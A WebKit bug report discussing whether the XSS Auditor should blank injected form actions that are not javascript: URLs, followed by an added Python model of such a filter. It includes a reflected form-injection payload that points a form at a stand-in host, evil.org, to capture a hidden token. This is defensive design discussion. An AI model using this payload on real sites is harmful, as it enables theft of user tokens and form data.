Bug 72585
Summary: XSS Auditor: <form> action is blocked even if it is not a JavaScript URL

| Field | Value | Field | Value |
|---|---|---|---|
| Product: | WebKit | Reporter: | prakash.1729 |
| Component: | WebCore Misc. | Assignee: | Nobody <webkit-unassigned> |
| Status: | RESOLVED WONTFIX | | |
| Severity: | Normal | CC: | abarth, ap, dbates, tsepez |
| Priority: | P2 | Keywords: | XSSAuditor |
| Version: | 528+ (Nightly build) | | |
| Hardware: | Unspecified | | |
| OS: | Linux | | |
prakash.1729
I observed that when I try to inject a FORM the "action" attribute is made empty even if it is not a JavaScript URL. So is this an exception?
Adam Barth
Yeah, we should only need to block JavaScript URLs.
(This is a false positive, so not a security bug.)
prakash.1729
Though it is a false positive according to the design, it is in fact protecting against <form> injection, which is good. It is the same with <iframe> injection, where the src attribute is removed even if the src is not a JavaScript URL.
One more corner case is that an <iframe> from the same domain can be injected successfully. I assume this is a design decision.
P.S. I couldn't find an example in which detecting an injected form is a false positive.
Thomas Sepez
Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam suggests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when the page contains:
<form action="http://good.com">
<input type="text" name="quantity" value="2">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
and the "quantity" input element contains an injection, and we reflect from the URL say
...?quantity="></form><form action="http://evil.org">
resulting in page:
<form action="http://good.com">
<input type="text" name="quantity" value=""></form><form action="http://evil.org">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>
So when the user hits submit, we steal his formkey token (or other information from input fields).
Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute.
Thanks heaps.
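As an added illustration of the policy Thomas describes (this is not WebKit's XSS Auditor code), the following model empties a form's action only when the `<form ... action=...` text is reflected from the request URL and the action is either a javascript: URL or points off the page's domain. The regex tag matching and the query-string reflection test are simplifying assumptions standing in for the auditor's tokenizer-level matching; the sample request and page are constructed from the example above.

```python
# Added example, not WebKit's own code: a simplified model of the auditor's
# decision for reflected <form> tags. Regex matching and the query-string
# reflection test are assumptions in place of the real tokenizer-level checks.
import re
from urllib.parse import urlsplit, parse_qsl

# Opening <form> tag up to and including the value of its action attribute.
FORM_ACTION_RE = re.compile(
    r'<form\b[^>]*?\baction\s*=\s*["\']?([^"\'\s>]*)', re.IGNORECASE)


def reflected_fragments(request_url):
    """Decoded query values: the attacker-controlled input that may be reflected."""
    query = urlsplit(request_url).query
    return [v for _, v in parse_qsl(query, keep_blank_values=True)]


def is_dangerous_action(action, page_host):
    """Block javascript: URLs (Adam's rule) and off-domain targets (Thomas's rule)."""
    parts = urlsplit(action)
    if parts.scheme.lower() == 'javascript':
        return True
    return bool(parts.netloc) and parts.netloc.lower() != page_host


def audit_forms(request_url, html):
    """Return (filtered_html, blocked_actions) for one request/response pair."""
    page_host = urlsplit(request_url).netloc.lower()
    fragments = [f.lower() for f in reflected_fragments(request_url)]
    blocked = []

    def fix(match):
        tag, action = match.group(0), match.group(1)
        reflected = any(tag.lower() in f for f in fragments)
        if reflected and is_dangerous_action(action, page_host):
            blocked.append(action)
            return tag.replace(action, '', 1)  # action="" : form no longer posts off-site
        return tag  # not reflected or same-origin: leave alone (avoids the false positive)

    return FORM_ACTION_RE.sub(fix, html), blocked


if __name__ == '__main__':
    # Constructed request and response modelled on the page shown above.
    url = 'http://good.com/order?quantity="></form><form action="http://evil.org"'
    page = ('<form action="http://good.com">\n'
            '<input type="text" name="quantity" value=""></form><form action="http://evil.org">\n'
            '<input type="hidden" name="formkey" value="91812727123812">\n'
            '<input type="submit">\n</form>')
    filtered, blocked_actions = audit_forms(url, page)
    print(blocked_actions)  # ['http://evil.org']
    print(filtered)
```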